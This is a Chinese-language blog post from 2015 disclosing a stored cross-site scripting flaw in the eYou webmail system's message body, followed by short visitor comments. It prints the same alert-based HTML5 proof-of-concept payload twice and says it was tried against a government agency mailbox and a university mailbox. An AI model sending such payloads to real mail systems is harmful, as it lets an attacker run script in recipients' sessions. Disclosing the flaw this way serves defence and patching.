eYou邮件系统邮件正文存储型XSS(HTML5特性并需点击)

时间:2015-2-11    作者:admin    分类: 技术交流


由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。

测试代码:

<!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>发送后打开,效果如图:

某党政机关邮箱:

QQ图片eyou120150121142357.jpg



QQ图片eyou220150121142545.jpg



某院校邮箱:

QQ图片eyou320150121142724.jpg

漏洞证明:

由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。

测试代码:

<!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>发送后打开,效果如图:

某党政机关邮箱:

QQ图片eyou120150121142357.jpg



QQ图片eyou220150121142545.jpg



某院校邮箱:

QQ图片eyou320150121142724.jpg

xss eYou

评论:

跨境电商之家 2016-02-13 02:08
非常不错!感谢!
大猫猫 2016-01-25 03:46
路过,看看
好文章 2016-01-14 11:22
关注学习一下
中国淋浴房 2015-12-03 06:44
来逛逛